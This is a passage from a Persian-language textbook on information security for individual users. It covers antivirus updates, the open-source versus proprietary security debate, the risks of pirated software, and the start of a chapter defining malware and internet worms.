ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻧﺎﮔﻬﺎﻥ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺁﻥ
ﻗﻄﻊ ﺷﻮﺩ ﻭ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﺧﺮﻳـﺪ ﺁﻧـﺮﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ .ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺑﺮﺧﻲ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱ ﻳﺎﺑﻬﺎ ﺍﮔﺮ ﺑﻄﻮﺭ ﻣﻨﻈﻢ )ﺭﻭﺯﺍﻧـﻪ ﻳـﺎ
ﻫﻔﺘﮕﻲ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺸﻮﻧﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺣـﺎﻟﺘﻲ
ﺑﺎﺷﺪ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ؛ ﺯﻳـﺮﺍ ﺍﮔـﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﺎﻳﻴﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺷﺮﺍﻳﻂ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻳﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ
ﺁﺧﺮﻳﻦ ﻧﻜﺘﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻛﻤﻲ ﺑﺤﺚ ﻣـﻲﻃﻠﺒـﺪ.
ﻣﺒﺎﺣﺜـﻪﺍﻱ ﻣﻴـﺎﻥ ﻃﺮﻓـﺪﺍﺭﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺘﻦﺑـﺎﺯ ﻭ ﻃﺮﻓــﺪﺍﺭﺍﻥ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻨﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻻﺧﺮﻩ ﻛـﺪﺍﻣﻴﻚ
ﺍﺯ ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﺍﻳﻤﻦﺗﺮ ﻫﺴﺘﻨﺪ.
ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻌﺘﻘﺪﻧﺪ:
•
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﺍﺳﺖ ،ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﺠﺰﻳﻪ ﻭ
ﺗﺤﻠﻴﻞ ﻛﻨﻨـﺪ ﻭ ﺗﻤـﺎﻣﻲ ﺍﺷـﻜﺎﻻﺗﻲ ﻛـﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻧﻬـﺎ
ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﺮﺩ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﺎﻳﻨﺪ.
•
ﭼﻮﻥ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻨـﺎﻃﻖ ﻣﺨﺘﻠـﻒ ﻭ ﺑـﺪﻭﻥ ﺭﻭﺍﺑـﻂ
ﺳﺎﺯﻣﺎﻧﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻣﺤـﺼﻮﻻﺕ ﻣـﺘﻦﺑـﺎﺯ ﻛـﺎﺭ
ﻛﻨﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ ﻭ
ﻓﻘــﺪﺍﻥ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺭ ﺍﺟــﺰﺍﻱ ﻣﺨﺘﻠــﻒ ﻣﻨﺠــﺮ ﺑــﻪ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﮔﺮﺩﺩ.
•
ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻪ
ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﻩ ﻭﺟــﻪ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ ،ﺩﺳــﺘﻮﺭﺍﺕ ﺍﻭ ﺭﺍ ﺩﻧﺒــﺎﻝ
ﻣــﻲﻛﻨﻨــﺪ ﻭ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﺑﺎﻋــﺚ ﻣــﻲﺷــﻮﺩ ﻛﻴﻔﻴــﺖ
ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺎﻻ ﺑﺎﺷﺪ.
•
ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ﻫــﻴﭻ ﻣﻨﺒــﻊ ﻣﻌﻴﻨــﻲ ﻣــﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﻗﺒــﺎﻝ
ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺑﺮ ﻋﻬﺪﻩ ﻧﺪﺍﺭﺩ ،ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴـﺖ
ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻧﻔـﺮﺍﺩﻱ ﺍﻫﻤﻴـﺖ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﺪ،
ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛـﻪ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ
ﺷﻮﺩ.
٣٤
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯﻱ ﻛﻪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﻫـﺴﺘﻨﺪ
ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﺎﺳﺒﻲ ﻣـﻮﺭﺩ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﺩﺭ
ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺎ ﺍﻳﻨﻜﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻋﺮﺿـﻪ
ﻣﻲ ﺷﻮﺩ ﺍﻣﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻳﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺁﻥ ﻫﺰﻳﻨﻪﺑﺮ ﺑﺎﺷﺪ .ﻧﺴﺨﺔ ﺭﺍﻳﮕـﺎﻥ Red Hat Linuxﻛـﻪ ﺩﺭ
ﺩﺳﺘﺮﺱ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻧﻤﻮﻧـﺔ ﺧـﻮﺑﻲ ﺍﺯ ﺍﻳـﻦ ﻗﺒﻴـﻞ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺍﺳﺖ .ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺧﻮﺍﻫـﺎﻥ ﺳـﻄﺢ ﺑﻴـﺸﺘﺮﻱ ﺍﺯ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺻﻠﻲ ﻭ ﻳﺎ
ﺣﺪﺍﻗﻞ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﺮﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻨﺪ .ﺍﮔـﺮ ﺗـﺼﻤﻴﻢ ﺑـﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺩﺍﺭﻳـﺪ ﻛـﻪ ﺧﺮﻳـﺪ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﻬـﺎ
ﺭﺍﻳﮕﺎﻥ ﺍﺳـﺖ )ﻣﺜـﻞ ﺑﻌـﻀﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻭ ﻣـﺘﻦﺑـﺎﺯ( ﺗﻮﺟـﻪ
ﺩﺍﺷﺘﻪﺑﺎﺷﻴﺪ ﻛﻪ ﻣـﺪﺕﺯﻣـﺎﻥ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻧـﺴﺨﻪﻫـﺎﻱ
ﺍﺻــﻼﺣﻲ ﺁﻧﻬــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻛﻮﺗــﺎﻩ ﺑﺎﺷــﺪ .ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﮔــﺮ
ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻳــﺎ ﺯﻳﺮﺳﻴــﺴﺘﻤﻬﺎﻱ ﻣﻬــﻢ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻧــﻮﻉ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ
ﺁﻧﺮﺍ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ )ﻣﺜ ﹰﻼ ﺩﺭ ﻫﺮ ﺷﺶ ﻣﺎﻩ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ.
ﺭﻭﻧــﺪ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺕ ﻣــﺘﻦﺑــﺎﺯ ﺑــﺴﻴﺎﺭ ﻣــﺸﻜﻠﺘﺮ ﺍﺯ
ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺗﻲ ﻣﺜــﻞ Microsoft Windows
ﺍﺳﺖ؛ ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻧـﺼﺐ ﺑـﺮﺍﻱ ﻣﺤـﺼﻮﻻﺕ
ﺍﺻﻠﻲ ﻣﺘﻦﺑﺎﺯ ﺍﻳﻦ ﻣﺸﻜﻞ ﻫﻢ ﺑﺮﻃﺮﻑ ﻣﻲﺷﻮﺩ .ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﻣﺘﻦﺑﺎﺯ ﻣﺒﺘﻨﻲ ﺑﺮ Windowsﻧﻴﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ
ﻛﺎﻣﭙﺎﻳﻞﺷﺪﻩ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﺼﺐﻛﻨﻨﺪﻩﻫﺎﻱ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ.
ﻫﻤﺎﻧﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ،Windowsﺑﺴﺘﻪ ﻫـﺎﻱ ﺑـﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﻭ
ﻭﺻﻠﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺑﺰﺭﮒ ،ﺑﺴﺘﻪ ﺑـﻪ
ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ .ﺷﻨﺎﺳﺎﻳﻲ ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ
ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻤﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺯﻣﺎﻥ download
ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ.
Open Source Software
34
ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﻣﻌﺘﻘﺪﻧﺪ:
•
ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺎ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﺎﺭ
ﻣﻲﻛﻨﻨﺪ ،ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺁﻧﻬـﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ ﺧﺒـﺮﻩ
ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺳﺮﻳﻌﹰﺎ ﺍﺻﻼﺡ ﻣﻲﮔﺮﺩﺩ.
•
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ
ﺍﺳﺖ ﻛﺪ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻱ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﮔﺮ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ
ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻣﺤﺼﻮﻝ ﺧﻮﺩ ﺍﺭﺯﺵ ﺧﺎﺻـﻲ ﻗﺎﺋـﻞ ﻧـﺸﺪﻩ
ﺑﺎﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﻣﻄﻠﻮﺑﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ
ﺑﺎﺷﺪ.
•
ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ
ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺤﺼﻮﻝ ﻣﺮﺍﺟﻌﻪ ﻛﺮﺩ ﻭ ﺍﻳـﻦ
ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺯﻣﺎﻧﻲ ﺯﻳﺎﺩﻱ ﺷﻮﺩ.
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
٦٩
ﺩﺭ ﻭﺍﻗﻊ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺩﻻﻳﻞ ﺩﺭ ﺟﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺻـﺤﻴﺢ ﻫـﺴﺘﻨﺪ.
ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﻳﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺩﻋﺎ ﻛـﺮﺩ ﻛـﻪ
ﻛﺸﻒ ﻭ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺻﻮﺭﺕ
ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﺧﻴﺮ .ﺩﺭ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ،ﻧﻤﻮﻧـﻪﻫـﺎﻳﻲ ﺍﺯ ﺭﻓﺘـﺎﺭ
ﺍﻳﺪﻩﺁﻝ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﻲﺩﻗﺘﻲ ﻃﺮﺍﺣﺎﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺩﻳﺪﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﻧﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ ﻧﻪ ﻧﺎﺷﺮﺍﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻫﻴﭽﻜﺪﺍﻡ ﻣﺮﻭﺝ ﺳـﺮﻗﺖ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ ،ﺍﻣﺎ ﺳﺎﺩﻩﺍﻧﮕﺎﺭﺍﻧـﻪ ﺍﺳـﺖ ﺍﮔـﺮ ﻭﺍﻧﻤـﻮﺩ ﻛﻨـﻴﻢ
ﭼﻨﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﺳﺮﻗﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺸﻜﻠﻲ ﺍﺳﺖ ﻛـﻪ
ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭﻟـﻲ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﺍﺗﻔـﺎﻕ
ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻫﺰﻳﻨﺔ ﻧﺴﺒﻲ ﺗﻬﻴﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗـﺎﻧﻮﻧﻲ ﺩﺭ
ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺩﺳﺘﻤﺰﺩﻫﺎ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ
ﺍﺳﺖ -ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺩﻭﺍﻳﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑـﺎ
ﻫﻤﻜﺎﺭﻱ ﻫﻢ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺭﺍ ﺑﺴﻴﺎﺭ ﻏﻴﺮ ﻣﺤﺘﻤﻞ ﻣﻲﺳﺎﺯﻧﺪ.
ﮔﺬﺷﺘﻪ ﺍﺯ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﻣﺴﺌﻮﻟﻴﻦ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ
ﺷﺪﻥ ﺣﻘﻮﻕ ﻣﺎﻟﻜﻴﺖ ﺳﺎﺯﻧﺪﺓ ﻣﺤﺼﻮﻝ ،ﺩﻭ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ.
ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺩﻭ ﻣﻮﺭﺩ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ ﭼﻨﺪﺍﻥ ﺭﺍﻳﺞ
ﻧﻴﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﺩﻭ ﺑﺎ ﻫـﻢ
ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
.۱
ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻗﺎﺑﻞ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺷـﺪﻥ
ﻧﺒﺎﺷﺪ ﻳﺎ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ.
.۲
ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺮﺧـﻲ ﺍﺯ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻫـﺎﻱ ﻣـﺴﺮﻭﻗﻪ ﺣـﺎﻭﻱ
ﻛﺎﺭﻛﺮﺩﻫــﺎﻳﻲ ﺑﺎﺷــﻨﺪ ﻛــﻪ ﺍﻧﺘﻈــﺎﺭ ﺁﻧﻬــﺎ ﺭﺍ ﻧﺪﺍﺭﻳــﺪ .ﺍﻳــﻦ
ﻛﺎﺭﻛﺮﺩﻫــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺎﻣﻞ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ،
ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ،ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ
ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ.
Pirated Software
35
ﺑﺨﺶ ﺩﻭﻡ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ
٣٥
٧١
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻓﺼﻞ ﭘﻨﺠﻢ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ
ﻛﻠﻴﺎﺕ
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻣﻔﻬﻮﻡ ﻭ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ )ﻧﻈﻴﺮ
ﻭﻳﺮﻭﺳﻬﺎ ،ﻛﺮﻡﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ،ﻭ ﺗﺮﺍﻭﺍﻫـﺎ( ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ
ﺗﻮﺯﻳﻊ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ.
ﻛﺮﻡ
ﺍﻳﻨﺘﺮﻧﺘﻲ
ﻛﺮﻣﻬﺎ ﺍﺯ ﺍﻳﻦ ﺟﻬﺖ ﻛﻪ ﻧـﺴﺨﻪﺍﻱ ﺍﺯ ﺧـﻮﺩ ﺭﺍ
ﺗﻜﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ﻣﺸﺎﺑﻪ ﻭﻳﺮﻭﺳـﻬﺎ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺑﺮﻧﺎﻣـﺔ ﻣﻴﺰﺑـﺎﻥ ﻧﻴـﺎﺯ ﻧﺪﺍﺭﻧـﺪ.
ﻫﻤﺎﻧﻨﺪ ﻭﻳﺮﻭﺳﻬﺎ ،ﻳﻚ ﻛﺮﻡ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻨﻬـﺎ
ﻧﺴﺨﻪﻫـﺎﻳﻲ ﺍﺯ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﺟﺎﻫـﺎﻱ ﻣﺨﺘﻠـﻒ
ﺗﻜﺮﺍﺭ ﻛﻨﺪ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﻋﻤﻠﻴـﺎﺕ
ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﺪ .ﻛﺮﻡ ﺗﻨﻬﺎ ﺯﻣـﺎﻧﻲ ﻛـﺎﺭ
ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻠﻴـﺖ ﭘـﺬﻳﺮﻓﺘﻦ ﻣﻨـﺎﺑﻊ
ﺧﺎﺭﺟﻲ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻥ ﻣﻨـﺎﺑﻊ
